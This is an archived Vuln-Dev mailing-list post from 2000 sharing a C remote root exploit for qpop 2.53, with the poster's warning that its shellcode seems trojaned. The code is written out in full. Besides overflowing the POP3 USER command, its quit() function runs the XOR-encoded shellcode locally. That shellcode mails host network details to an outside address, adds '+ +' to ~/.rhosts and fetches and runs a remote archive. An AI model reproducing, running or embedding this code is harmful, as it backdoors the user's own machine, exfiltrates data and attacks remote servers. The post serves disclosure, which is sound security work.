Vulnerability Development mailing list archives
QPOP2.5* exploit ??
From: batrox () SWBELL NET (Ryan Sweat)
Date: Sun, 14 May 2000 12:30:03 -0500
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been
thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what
it does.
bat
/* PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!!
*
*
* qpop 2.53 remote root exploit for linux
* tested on redhat 6.x and 5.x, and slack7
* offsets for redhat 6: 100
* redhat 5: 150
*
* slackware: 200
*
* these offsets were an average, however the buffer is small and
* the address must almost be exact. Perhaps try a offset brute forcer.
*
* code by John Slockavich, copyright Febuary 25th, 2000
* this code for educational purposes only
*
*
*
* If this exploit is successful, you should have a bindshell on port 1524
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <linux/ip.h>
#define RET 0xbffff6b2
#define NOP 0x90
#define PORT 110
#define BSIZE 512
int (*qpop_proc)();
void quit(int x);
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8
0\x36\x02\x46\xe2\xfa"
"\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
"\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
"\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
"\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
"\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
"\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
"\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
"\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
"\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
"\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
"\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
"\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
"\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
"\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
"\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
"\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
"\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
"\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
"\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
"\x92\x92";
void usage(char *name)
{
fprintf(stderr,"qpop 2.53 exploit by John Slockavich\n"
"Usage: %s <hostname> <offset>\n"
, name);
exit(1);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *he;
char *hostname, *ptr, *buff;
char sendbuf[BSIZE+20];
long *addr_ptr, addr;
int rfd;
int sfd;
int i;
int offset = 0;
if (argc < 2)
usage(argv[0]);
hostname = argv[1];
if (argv[2])
offset = atoi(argv[2]);
(char *)qpop_proc = shellcode;
if (!(buff = malloc(BSIZE))) {
perror("malloc");
exit(0);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
if ((he = gethostbyname(hostname)) == NULL) {
herror("resolve");
exit(0);
}
bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length);
if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
perror("socket");
exit(1);
}
if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
exit(1);
}
addr = RET - offset;
printf("preparing buffer using addr 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < BSIZE; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < BSIZE/2; i++)
buff[i] = NOP;
ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[BSIZE - 1] = '\0';
if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
quit(1);
}
printf("connected, sending shellcode...\n");
snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff);
if (write(sfd, sendbuf, strlen(sendbuf)) < 0) {
perror("write");
quit(1);
}
close(sfd);
quit(0);
}
void quit(int x)
{
qpop_proc();
exit(x);
}
Current thread:
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Knud Erik Højgaard (Apr 14)
- <Possible follow-ups>
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Harmer, Mike (May 12)
- regarding phrack49's stack smashing tutorial Christian Hammers (May 13)
- Re: regarding phrack49's stack smashing tutorial Precious Roy (May 13)
- Re: regarding phrack49's stack smashing tutorial Bluefish (May 13)
- QPOP2.5* exploit ?? Ryan Sweat (May 14)
- Re: QPOP2.5* exploit ?? H D Moore (May 14)
- Re: QPOP2.5* exploit ?? jms (May 13)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- regarding phrack49's stack smashing tutorial Christian Hammers (May 13)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)